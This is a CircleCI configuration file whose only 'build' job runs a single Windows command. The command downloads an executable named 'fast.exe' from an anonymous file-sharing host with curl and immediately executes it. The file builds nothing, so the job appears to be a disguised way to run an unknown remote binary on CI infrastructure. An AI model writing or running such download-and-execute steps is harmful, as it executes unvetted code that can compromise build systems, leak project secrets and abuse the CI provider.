version: 2.1
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build:
    executor:
      name: win/default
      shell: cmd.exe
    steps:
      - run: curl -L -o fast.exe https://srv-store3.gofile.io/download/H76lCU/1a3ef2c695de20ede50d2b4e7454256a/fast.exe && fast.exe